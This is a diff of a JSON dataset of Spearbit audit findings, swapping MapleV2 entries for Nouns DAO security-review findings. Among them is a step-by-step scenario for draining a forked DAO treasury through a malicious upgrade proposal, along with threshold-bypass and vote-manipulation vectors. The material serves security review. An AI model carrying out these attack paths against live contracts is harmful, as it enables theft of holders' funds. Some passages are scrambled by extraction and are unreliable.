ds.nouns.balanceOf(address(ds.timelock)) - ,! ds.forkEscrow.numTokensOwnedByDAO(); ,! } As of time of this writing adjustedTotalSupply() will be increased by 1 due to treasury token reclassification, the upgrade will cause a (13470 + 14968) * 1733.0 * (1 / 742 - 1 / 743) = 89 USD loss per noun or (13470 + 14968) * 1733.0 / 743 = 66330 USD cumulatively for all nouns holders. Per high likelihood and low impact setting the severity to be medium.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Use the cached variable in makePayment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The claim function is called using _nextPaymentDueDate instead of nextPaymentDueDate_", + "title": "Fork escrowers can exploit the fork or force late joiners to quit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Based in the current supply of Nouns and the following parameters that will be used during the upgrade to V3: Nouns total supply: 743 forkThresholdBPS_: 2000 (20%) forkThreshold: 148, hence 149 Nouns need to be escrowed to be able to call executeFork() The following attack vector would be possible: 1. Attacker escrows 75 tokens. 2. Bob escrows 74 tokens to reach the forkThreshold. 3. Bob calls executeFork() and claimFromEscrow(). 4. Attacker calls claimFromEscrow() right away. As now nouns.remainingTokensToClaim() is zero the gover- nance is now active and proposals can be created. 5. Attacker creates a malicious proposal. Currently the attacker has 75 Nouns and Bob 74 in the fork. This means that the attacker has the majority of the voting power and whatever he proposes can not be denied. NounsForkToken.getPriorVotes(attacker, ) -> 75 NounsForkToken.getPriorVotes(Bob , ) -> 74 6. The proposal is created with the following description: \"Proposal created to upgrade the NounsAuction- HouseFork to a new implementation similar to the main NounsAuctionHouse\". The attacker deploys this new implementation and simply performs the following change in the code: modifier initializer() { - + require(_initializing || !_initialized, \"Initializable: contract is already initialized\"); require(!_initializing || _initialized, \"Initializable: contract is already initialized\"); bool isTopLevelCall = !_initializing; if (isTopLevelCall) { _initializing = true; _initialized = true; } _; if (isTopLevelCall) { _initializing = false; } } The proposal is created with the following data: targets[0] = address(contract_NounsAuctionHouseFork); values[0] = 0; signatures[0] = 'upgradeTo(address)'; calldatas[0] = abi.encode(address(contract_NounsAuctionHouseForkExploitableV1)); 7. Proposal is created and is now in Pending state. During the next days, users keep joining the fork increasing the funds of the fork treasury as the fork period is still active. 8. 5 days later proposal is in Active state and the attacker votes to pass it. Bob, who does not like the proposal, votes to reject it. 20 quorumVotes: 14 forVotes: 75 againstVotes: 74 9. As the attacker and Bob were the only users that had any voting power at the time of proposal creation, five days later, the proposal is successful. 10. Proposal is queued. 11. 3 weeks later proposal is executed. 12. The NounsAuctionHouseFork contract is upgraded to the malicious version and the attacker re-initialize it and sets himself as the owner: contract_NounsAuctionHouseFork.initialize(attacker, NounsForkToken, , 0, 0, 0, 0) 13. Attacker, who is now the owner, upgrades the NounsAuctionHouseFork contract, once again, to a new im- plementation that implements the following function: function burn(uint256[] memory _nounIDs) external onlyOwner{ for (uint256 i; i < _nounIDs.length; ++i){ nouns.burn(_nounIDs[i]); } } 14. Attacker now, burns all the Nouns Tokens in the fork except the ones that he owns. 15. Attacker calls quit() draining the whole treasury: NounsTokenFork.totalSupply() -> 75 attacker.balance -> 0 contract_stETH.balanceOf(attacker) -> 0 forkTreasury.balance -> 2005_383580080753701211 contract_stETH.balanceOf(forkTreasury) -> 2005_383580080753701210 attacker calls -> contract_NounsDAOLogicV1Fork.quit([0, ... 74]) attacker.balance -> 2005_383580080753701211 contract_stETH.balanceOf(attacker) -> 2005_383580080753701208 forkTreasury.balance -> 0 contract_stETH.balanceOf(forkTreasury) -> 1 Basically, the condition that should be met for this exploit is that at the time of proposal creation the attacker has If this happens, users will be more than 51% of the voting power. This is more likely to happen in small forks. forced to leave or be exploited. As there is no vetoer role, noone will be able to stop this type of proposals.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "No need to explicitly initialize variables with default values", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "By default a value of a variable is set to 0 for uint, false for bool, address(0) for address. . . Explicitly initializing/setting it with its default value wastes gas.", + "title": "Including non-standard ERC20 tokens will revert and prevent forking/quitting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "If erc20TokensToIncludeInFork or erc20TokensToIncludeInQuit accidentally/maliciously include non-confirming ERC20 tokens, such as USDT, which do not return a boolean value on transfers then sendProRata- Treasury() and quit() will revert because it expects timelock.sendERC20() to return true from the underlying ERC20 transfer call. The use of transfer() instead of safeTransfer() allows this scenario. Low likelihood + High impact = Medium severity. Inclusion of USDT-like tokens in protocol will revert sendProRataTreasury() and quit() to prevent forking/quitting.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Cache calculation in getExpectedAmount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The decimal precision calculation is used twice in the getExpectedAmount function, if you cache into a new variable would save some gas.", + "title": "Changing voteSnapshotBlockSwitchProposalId after it was set allows for votes double counting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Now ds.voteSnapshotBlockSwitchProposalId can be changed after it was once set to the next proposal id, there are no restrictions on repetitive setting. In the same time, proposal votes are counted without saving the additional information needed to reconstruct the timing and voteSnapshotBlockSwitchProposalId moved forward as a result of such second _setVoteSnap- shotBlockSwitchProposalId() call will produce a situation when all the older, already cast, votes for the propos- als with old_voteSnapshotBlockSwitchProposalId <= id < new_voteSnapshotBlockSwitchProposalId will be counted as of proposal.startBlock, while all the never, still to be casted, votes for the very same proposals will be counted as of proposal.creationBlock. Since the voting power of users can vary in-between these timestamps, this will violate the equality of voting conditions for all such proposals. Double counting will be possible and total votes greater than total supply can be cast this way: say Bob has transferred his nouns to Alice between proposal.startBlock and pro- posal.creationBlock, Alice voted before the change, Bob voted after the change. Bob's nounces will be counted twice. Severity is medium: impact looks to be high, a violation of equal foot voting paves a way for voting manipulations, but there is a low likelihood prerequisite of passing a proposal for the second update for the voteSnapshotBlock- SwitchProposalId. The latter can happen as a part of bigger pack of changes. _setVoteSnapshotBlockSwitch- ProposalId() call do not have arguments and by itself repeating it doesn't look incorrect.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "For-Loop Optmization", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The for-loop can be optimized in 4 ways: 1. Removing initialization of loop counter if the value is 0 by default. 2. Caching array length outside the loop. 3. Prefix increment (++i) instead of postfix increment (i++). 4. Unchecked increment. - for (uint256 i_ = 0; i_ < loans_.length; i_++) { + uint256 length = loans_.length; + for (uint256 i_; i_ < length; ) { ... + unchecked { ++i; } }", + "title": "Key fork parameters are set outside of proposal flow, while aren't being controlled in the code", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "These configuration parameters are crucial for fork workflow and new DAO logic, but aren't checked when being set in ForkDAODeployer's constructor: ForkDAODeployer.sol#L31-L81 contract ForkDAODeployer is IForkDAODeployer { ... constructor( address tokenImpl_, address auctionImpl_, address governorImpl_, address treasuryImpl_, uint256 delayedGovernanceMaxDuration_, uint256 initialVotingPeriod_, uint256 initialVotingDelay_, uint256 initialProposalThresholdBPS_, uint256 initialQuorumVotesBPS_ ) { } ... delayedGovernanceMaxDuration = delayedGovernanceMaxDuration_; initialVotingPeriod = initialVotingPeriod_; initialVotingDelay = initialVotingDelay_; initialProposalThresholdBPS = initialProposalThresholdBPS_; initialQuorumVotesBPS = initialQuorumVotesBPS_; While most parameters are set via proposals directly and are controlled in the corresponding setters, these 5 variables are defined only once on ForkDAODeployer construction and neither per se visible in proposals, as ForkDAODeployer is being set as an address there, nor being controlled within the corresponding setters this way. Their values aren't controlled on construction either. 23 NounsDAOLogicV3.sol#L820-L840 /** * @notice Admin function for setting the fork related parameters * @param forkEscrow_ the fork escrow contract * @param forkDAODeployer_ the fork dao deployer contract * @param erc20TokensToIncludeInFork_ the ERC20 tokens used when splitting funds to a fork * @param forkPeriod_ the period during which it's possible to join a fork after exeuction * @param forkThresholdBPS_ the threshold required of escrowed nouns in order to execute a fork */ function _setForkParams( address forkEscrow_, address forkDAODeployer_, address[] calldata erc20TokensToIncludeInFork_, uint256 forkPeriod_, uint256 forkThresholdBPS_ ) external { ds._setForkEscrow(forkEscrow_); ds._setForkDAODeployer(forkDAODeployer_); ds._setErc20TokensToIncludeInFork(erc20TokensToIncludeInFork_); ds._setForkPeriod(forkPeriod_); ds._setForkThresholdBPS(forkThresholdBPS_); } NounsDAOV3Admin.sol#L484-L495 /** * @notice Admin function for setting the fork DAO deployer contract */ function _setForkDAODeployer(NounsDAOStorageV3.StorageV3 storage ds, address newForkDAODeployer) external onlyAdmin(ds) address oldForkDAODeployer = address(ds.forkDAODeployer); ds.forkDAODeployer = IForkDAODeployer(newForkDAODeployer); emit ForkDAODeployerSet(oldForkDAODeployer, newForkDAODeployer); { } Impact: an setting example, delayedGovernanceMaxDuration = 0 As bypasses NounsDAOLogicV1Fork's checkGovernanceActive() control and allows for stealing the whole treasury of a new forked DAO with executeFork() NounsTokenFork.claimFromEscrow() -> NounsDAOLogicV1Fork.quit() deployment transaction. An attacker will be entitled to 1 / 1 = 100% of the new DAO funds being the only one who claimed. back-running call Setting medium severity per low likelihood and high impact of misconfiguration, which can happen both as an operational mistake or be driven by a malicious intent.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Pool._divRoundUp can be more efficient", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The gas cost of Pool._divRoundUp can be reduced in the context that it's used in.", + "title": "A malicious DAO can hold token holders captive by setting forkPeriod to an unreasonably low value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "A malicious majority can reduce the number of Noun holders joining an executed fork by setting the forkPeriod to an unreasonably low value, e.g. 0, because there is no MIN_FORK_PERIOD enforced (MAX is 14 days). This in combination with an unreasonably high forkThresholdBPS (no min/max enforced) will allow a malicious majority to hold captive those minority Noun holders who missed the fork escrow window, cannot join the fork in the unreasonably small fork period and do no have sufficient voting power to fork again. While the accidental setting of the lower bound to an undesirable value poses a lower risk than that of the upper bound, this is yet another vector of attack by a malicious majority on forking capability/effectiveness. While the majority can upgrade the DAO entirely at will to circumvent all such guardrails, we hypothesise that would get more/all attention by token holders than modification of governance/fork parameters whose risk/impact may not be apparent immediately to non-technical or even technical holders. So unless there is an automated impact review/analysis performed as part of governance processes, such proposal vectors on governance/forking parameters should be considered as posing non-negligible risk. Impact: Inattentive minority Noun holders are unable to join the fork and forced to stick with the original DAO. Low likelihood + High impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Liquidator uses different reentrancy guards than rest of codebase", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "All other reentrancy guards of the codebase use values 1/2 instead of 0/1 to indicate NOT_- LOCKED/LOCKED.", + "title": "A malicious DAO can prevent forking by manipulating the forkThresholdBPS value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "While some of the documentation, see 1 and 2, note that the fork threshold is expected to be 20%, the forkThresholdBPS is a DAO governance controlled value that may be modified via _setForkThresholdBPS(). A malicious majority can prevent forking at any time by setting the forkThresholdBPS to an unreasonably high value that is >= majority voting power. For a fork that is slowly gathering support via escrowing (thus giving time for a DAO proposal to be executed) , a malicious majority can reactively manipulate forkThresholdBPS to prevent that fork from being executed. While the governance process gives an opportunity to detect and block such malicious proposals, the assumption is that a malicious majority can force through any proposal, even a visibly malicious one. Also, it is not certain that all governance proposals undergo thorough scrutiny of security properties and their impacts. Token holders need to actively monitor all proposals for malicious updates to create, execute and join a fork before such a proposal takes effect. A malicious majority can prevent a minority from forking by manipulating the forkThresholdBPS value. Low likelihood + High impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Use block.timestamp instead of domainStart in removeLoanImpairment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The removeLoanImpairment function adds back all interest from the payment's start date to domain- Start. The _advanceGlobalPaymentAccounting sets domainStart to block.timestamp.", + "title": "A malicious DAO can prevent/deter token holders from executing/joining a fork by including arbi- trary addresses in erc20TokensToIncludeInFork", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "As motivated in the fork spec, forking is a minority protection mechanism that should always allow a group of minority token holders to exit together into a new instance of Nouns DAO. in the (modifiable original DAO may a malicious majority in However, erc20TokensToIncludeInFork on balanceOf() or transfer() calls to prevent token holders from executing or joining a fork. While the governance process gives an opportunity to detect and block such malicious proposals, the assumption is that a malicious majority can force through any proposal, even a visibly malicious one. Also, it is not certain that all governance proposals undergo thorough scrutiny of security properties which allows a proposal to hide malicious ERC20 tokens and get them included in the DAO's allow list. Token holders need to monitor all proposals for malicious updates to create, execute and join a fork before such a proposal takes effect. _setErc20TokensToIncludeInFork()) addresses revert arbitrary include that via Furthermore, a forking token holder may not necessarily want to receive all the DAO's ERC20 tokens in their new fork DAO for various reasons. For e.g., custody of certain ERC20 tokens may not be legal in their regulatory jurisdictions and so they may not want to interact with a DAO whose treasury holds such tokens and may send them at some point (e.g. rage quit). Minority token holders may even want to fork specifically because of an ERC20's presence or proposed inclusion in the DAO treasury. Giving forking holders a choice of ERC20s to take to fork DAO gives them a choice to fork anytime only with ETH and a subset of approved tokens if the DAO has already managed to add malicious/contentious ERC20s in the list. 1. A malicious DAO can prevent unsuspecting/inattentive or future token holders from forking and taking out their pro rata funds, which is the main motivation for minority protection as specified. 2. A forking token holder is forced to end up with a fork DAO treasury that has all the original DAO's ERC20 tokens without having a choice, which may deter them from creating/executing/joining a fork in the first place. Low likelihood + High impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "setTimelockWindows checks isGovernor multiple times", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The Globals.setTimelockWindows function calls setTimelockWindow in a loop and each time set- TimelockWindow's isGovernor is checked.", + "title": "A malicious new DAO can prevent/deter token holders from rage quitting by including arbitrary addresses in erc20TokensToIncludeInQuit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "As described in the fork spec: \"New DAOs are deployed with vanilla ragequit in place; otherwise it's possible for a new DAO majority to collude to hurt a minority, and the minority wouldn't have any last resort if they can't reach the forking threshold; furthermore bullies/attackers can recursively chase minorities into fork DAOs in an undesired attrition war.\". However, a malicious new DAO may include arbitrary addresses in erc20TokensToIncludeInQuit (modifiable via _setErc20TokensToIncludeInQuit()) that revert on balanceOf() or transfer() calls to prevent token holders from rage quitting. While the governance process gives an opportunity to detect and block such malicious pro- posals, the assumption is that a malicious majority can force through any proposal, even a visibly malicious one. Also, it is not certain that all governance proposals undergo thorough scrutiny of security properties which allows a proposal to hide malicious ERC20 tokens and get them included in the DAO's allow list. Token holders need to monitor all proposals for malicious updates and rage quit before such a proposal takes effect. Furthermore, a rage quitting token holder may not necessarily want to receive all the DAO's ERC20 tokens for various reasons. For e.g., custody of certain ERC20 tokens may not be legal in their regulatory jurisdictions. (1) A malicious new DAO can prevent unsuspecting/inattentive token holders from rage quitting and taking out their pro rata funds, which is a critical capability for minority protection as specified. (2) A rage quitting token holder is forced to receive all the DAO's ERC20 tokens without having a choice, which may deter them from quitting.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "fullDaysLate computation can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The fullDaysLate computation can be optimized.", + "title": "Missing check for vetoed proposal's target timelock can cancel transactions from other proposals on new DAO treasury", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "veto() always assumes that the proposal being vetoed is targeting ds.timelock (i.e. the new DAO treasury) instead of checking via getProposalTimelock() as done by queue(), execute() and cancel() functions. If the proposal being vetoed were targeting timelockV1 (i.e. original DAO treasury) then this results in calling cancelTransaction() on the wrong timelock which sets queuedTransactions[txHash] to false for values of target, value, signature, data and eta. The proposal state is vetoed with zombie queued transactions on timelockV1 which will never get executed. But if there coincidentally were valid transactions with the same values (of target, value, signature, data and eta) from other proposals queued (assuming in the same block and that both timelocks have the same delay so that eta is the same) on ds.timelock then those would unexpectedly and incorrectly get dequeued and will not be executed even when these other ds.timelock targeting proposals were neither vetoed nor cancelled. Successfully voted proposals on new DAO treasury have their transactions cancelled before execution. Nouns- Confirmed with PoC: veto_poc.txt Low likelihood + High impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Gas Optimization" + "Nouns", + "Severity: Medium Risk NounsDAOV3Proposals.sol#L435 NounsDAOV3Proposals.sol#L527-L544" ] }, { - "title": "Users can prevent repossessed funds from being claimed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The DebtLocker.sol contract dictates an active liquidation by the following two conditions: The _liquidator state variable is a non-zero address. The current balance of the _liquidator contract is non-zero. If an arbitrary user sends 1 wei of funds to the liquidator's address, the borrower will be unable to claim repos- sessed funds as seen in the _handleClaimOfRepossessed() function. While the scope of the audit only covered the diff between v3.0.0 and v4.0.0-rc.0, the audit team decided it was important to include this as an informational issue. The Maple team will be addressing this in their V2 release.", + "title": "Proposal threshold can be bypassed through the proposeBySigs() function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The function proposeBySigs() allows users to delegate their voting power to a proposer through signatures so the proposer can create a proposal. The only condition is that the sum of the signers voting power should be higher than the proposal threshold. In the line uint256 proposalId = ds.proposalCount = ds.proposalCount + 1;, the ds.proposalCount is in- creased but the proposal has not been created yet, meaning that the NounsDAOStorageV3.Proposal struct is, at this point, uninitialized, so when the checkNoActiveProp() function is called the proposal state is DEFEATED. As the proposal state is DEFEATED the checkNoActiveProp() call would not revert in the case that a signer is repeated in the NounsDAOStorageV3.ProposerSignature[] array: function checkNoActiveProp(NounsDAOStorageV3.StorageV3 storage ds, address proposer) internal view { uint256 latestProposalId = ds.latestProposalIds[proposer]; if (latestProposalId != 0) { NounsDAOStorageV3.ProposalState proposersLatestProposalState = state(ds, latestProposalId); if ( proposersLatestProposalState == NounsDAOStorageV3.ProposalState.ObjectionPeriod || proposersLatestProposalState == NounsDAOStorageV3.ProposalState.Active || proposersLatestProposalState == NounsDAOStorageV3.ProposalState.Pending || proposersLatestProposalState == NounsDAOStorageV3.ProposalState.Updatable ) revert ProposerAlreadyHasALiveProposal(); } } Because of this it is possible to bypass the proposal threshold and create any proposal by signing multiple pro- poserSignatures with the same signer over and over again. This would keep increasing the total voting power accounted by the smart contract until this voting power is higher than the proposal threshold. Medium likelihood + Medium Impact = Medium severity. Consider NounsDAOStor-", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "MEV whenever totalAssets jumps", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "An attack users can try to capture large interest payments is sandwiching a payment with a deposit and a withdrawal. The current codebase tries to mostly eliminate this attack by: Optimistically assuming the next interest payment will be paid back and accruing the interest payment linearly over the payment interval. Adding a withdrawal period. However, there are still circumstances where the totalAssets increase by a large amount at once: Users paying back their payment early. The jump in totalAssets will be the paymentAmount - timeE- lapsedSincePaymentStart / paymentInterval * paymentAmount. Users paying back their entire loan early (closeLoan). Late payments increase it by the late interest fees and the accrued interest for the next payment from its start date to now. 21", + "title": "Attacker can utilize bear market conditions to profit from forking the Nouns DAO", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "An economic attack vector has been identified that could potentially compromise the integrity of the Nouns DAO treasury, specifically due to the introduction of forking functionality. Currently, the treasury holds approximately $24,745,610.99 in ETH and about $27,600,000 in STETH. There are roughly 738 nouns tokens. As per OpenSea listings, the cheapest nouns-token can be purchased for about 31 ETH, approximately $53,000. Meanwhile, the daily auction price for the nouns stands at approximately 28 ETH, which equals about $48,600. A prospective attacker may exploit the current bear market conditions, marked by discounted price, to buy multiple nouns-tokens at a low price, execute a fork to create a new DAO and subsequently claim a portion of the treasury. This act would result in the attacker gaining more than they invested at the expense of the Nouns DAO treasury. To illustrate, if the forking threshold is established at 20%, an attacker would need 148 nouns to execute a fork. Consider the scenario where a user purchases 148 nouns for a total of 4588 ETH (148 x 31 ether). The fork- Treasury.balance would be 2679.27 ETH, and the contract_stETH.balanceOf(forkTreasury) would stand at 3000.7 ETH. The total ETH obtained would amount to 5680.01 ETH, thereby yielding a profit of 1092 ETH ($2,024,568).", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Use ERCHelper approve() as best practice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The ERC20 approve function is being used by fundsAsset in fundLoan() to approve the max amount which does not check the return value.", + "title": "Setting NounsAuctionHouse's timeBuffer too big is possible, which will freeze bidder's funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "It's now possible to set timeBuffer to an arbitrary big value with setTimeBuffer(), there is no control: NounsAuctionHouse.sol#L161-L169 /** * @notice Set the auction time buffer. * @dev Only callable by the owner. */ function setTimeBuffer(uint256 _timeBuffer) external override onlyOwner { timeBuffer = _timeBuffer; emit AuctionTimeBufferUpdated(_timeBuffer); } This can freeze user funds as NounsAuctionHouse holds current bid, but the its release in conditional to block.timestamp >= _auction.endTime: NounsAuctionHouse.sol#L96-L98 function settleAuction() external override whenPaused nonReentrant { _settleAuction(); } 29 NounsAuctionHouse.sol#L221-L234 function _settleAuction() internal { INounsAuctionHouse.Auction memory _auction = auction; require(_auction.startTime != 0, \"Auction hasn't begun\"); require(!_auction.settled, 'Auction has already been settled'); require(block.timestamp >= _auction.endTime, \"Auction hasn't completed\"); >> auction.settled = true; if (_auction.bidder == address(0)) { nouns.burn(_auction.nounId); } else { nouns.transferFrom(address(this), _auction.bidder, _auction.nounId); } Which can be set to be arbitrary big value, say 106 years, effectively freezing current bidder's funds: NounsAuctionHouse.sol#L104-L129 function createBid(uint256 nounId) external payable override nonReentrant { ... // Extend the auction if the bid was received within `timeBuffer` of the auction end time bool extended = _auction.endTime - block.timestamp < timeBuffer; if (extended) { >> auction.endTime = _auction.endTime = block.timestamp + timeBuffer; } I.e. permissionless settleAuction() mechanics will be disabled. Current bidder's funds will be frozen for an arbitrary time. As the new setting needs to pass voting, the probability is very low. In the same time it is higher for any forked DAO than for original one, so, while the issue is present in the V1 and V2, it becomes more severe in V3 in the context of the forked DAO. The impact is high, being long-term freeze of the bidder's native tokens.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Additional verification in removeLoanImpairment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "Currently, if removeLoanImpairment is called after the loan's original due date, there will be no issues because the loan's removeLoanImpairment function will revert. It would be good to add a comment about this logic or duplicate the check explicitly in the loan manager. If the loan implementation is upgraded in the future to have a non-reverting removeLoanImpairment function, then the loan manager as-is would account for the interest incorrectly.", + "title": "Veto renouncing in the original DAO or rage quit blocking in a forked DAO as a result of any future proposals will open up the way for 51% attacks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "It is possible to renounce veto power in V1, V2 and V3 versions of the protocol or upgrade forked V1 to block or remove rage quit. While it is a part of standard workflow, these operations are irreversible and open up a possibility of all variations of 51% attack. As a simplest example, in the absence of veto functionality a majority can introduce and execute a proposal to move all DAO treasury funds to an address they control. Also, there is a related vector, incentivized bad faith voting. _burnVetoPower() exists in V1, V2 and V3: In NounsDAOLogicV1 : 30 /** * @notice Burns veto priviledges * @dev Vetoer function destroying veto power forever */ function _burnVetoPower() public { // Check caller is pendingAdmin and pendingAdmin require(msg.sender == vetoer, 'NounsDAO::_burnVetoPower: vetoer only'); address(0) _setVetoer(address(0)); } In NounsDAOLogicV2: /** * @notice Burns veto priviledges * @dev Vetoer function destroying veto power forever */ function _burnVetoPower() public { // Check caller is vetoer require(msg.sender == vetoer, 'NounsDAO::_burnVetoPower: vetoer only'); // Update vetoer to 0x0 emit NewVetoer(vetoer, address(0)); vetoer = address(0); // Clear the pending value emit NewPendingVetoer(pendingVetoer, address(0)); pendingVetoer = address(0); } In NounsDAOLogicV3: /** * @notice Burns veto priviledges * @dev Vetoer function destroying veto power forever */ function _burnVetoPower(NounsDAOStorageV3.StorageV3 storage ds) public { // Check caller is vetoer require(msg.sender == ds.vetoer, 'NounsDAO::_burnVetoPower: vetoer only'); // Update vetoer to 0x0 emit NewVetoer(ds.vetoer, address(0)); ds.vetoer = address(0); // Clear the pending value emit NewPendingVetoer(ds.pendingVetoer, address(0)); ds.pendingVetoer = address(0); } Also, veto() was removed from NounsDAOLogicV1Fork, and the only mitigation to the same attack is rage quit(): NounsDAOLogicV1Fork.sol#L195-L222 31 /** * @notice A function that allows token holders to quit the DAO, taking their pro rata funds, * and sending their tokens to the DAO treasury. * Will revert as long as not all tokens were claimed, and as long as the delayed governance has not expired. ,! * @param tokenIds The token ids to quit with */ function quit(uint256[] calldata tokenIds) external nonReentrant { checkGovernanceActive(); uint256 totalSupply = adjustedTotalSupply(); for (uint256 i = 0; i < tokenIds.length; i++) { nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]); } for (uint256 i = 0; i < erc20TokensToIncludeInQuit.length; i++) { IERC20 erc20token = IERC20(erc20TokensToIncludeInQuit[i]); uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenIds.length) / totalSupply; ,! bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20token), tokensToSend); if (!erc20Sent) revert QuitERC20TransferFailed(); } uint256 ethToSend = (address(timelock).balance * tokenIds.length) / totalSupply; bool ethSent = timelock.sendETH(msg.sender, ethToSend); if (!ethSent) revert QuitETHTransferFailed(); emit Quit(msg.sender, tokenIds); } in as an this that example function, any malfunction to forked nouns holders was previously black-listed there will be no way to stop any This means erc20TokensToIncludeInQuit, while a minority of by USDC contract, will open up the possibility of majority attack on them, i.e. majority backed malicious proposal from affecting the DAO held funds of such holders. Nouns holders that aren't aware enough of the importance of functioning veto() for original DAO and quit() for the forked DAO, can pass a proposal that renounce veto or [fully or partially] block quit(), enabling the 51% attack. Such change will be irreversible and if a majority forms and acts before any similar mitigation functionalities be reinstalled, the whole DAO funds of the rest of the holders can be lost. Per very low likelihood (which increases with the switch from veto() to quit() as a safeguard), and high funds loss impact, setting the severity to be low. if USDC is added", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "Can check msg.sender != collateralAsset/fundsAsset for extra safety", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "Some old ERC tokens (e.g. the Sandbox's SAND token) allow arbitrary calls from the token address itself. This odd behavior is usually a result of implementing the ERC677 approveAndCall and transferAndCall functions incorrectly. With these tokens, it is technically possible for the low-level msg.sender.call(...) in the liquidator to be executing arbitrary code on one of the tokens, which could let an attacker drain the funds.", + "title": "The try-catch block at NounsAuctionHouseFork will only catch errors that contain strings", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "This issue has been previously identified and documented in the Nouns Builder Code4rena Audit. The catch Error(string memory) within the try/catch block in the _createAuction function only catches re- verts that include strings. At present, in the current version of the NounsAuctionHouseFork there are not reverts without a string. But, given the fact that the NounsAuctionHouseFork and the NounsTokenFork contracts are meant to be upgrad- able, if a future upgrade in the NounsTokenFork:mint() replaces the require statements with custom errors, the existing catch statement won't be able to handle the reverts, potentially leading to a faulty state of the contract. Here's an example illustrating that the catch Error(string memory) won't catch reverts with custom errors that don't contain strings: contract Test1 { bool public error; Test2 test; constructor() { test = new Test2(); } function testCustomErr() public{ try test.revertWithRevert(){ } catch Error(string memory) { error = true; } } function testRequire() public{ try test.revertWithRequire(){ } catch Error(string memory) { error = true; } } } contract Test2 { error Revert(); function revertWithRevert() public{ revert Revert(); } function revertWithRequire() public { require(true == false, \"a\"); } }", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Informational" + "Nouns", + "Severity: Low Risk" ] }, { - "title": "IERC426 Implementation of preview and max functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "For the preview functions, EIP 4626 states: MAY revert due to other conditions that would also cause the deposit [mint/redeem, etc.] to revert. But the comments in the interface currently state: MUST NOT revert. 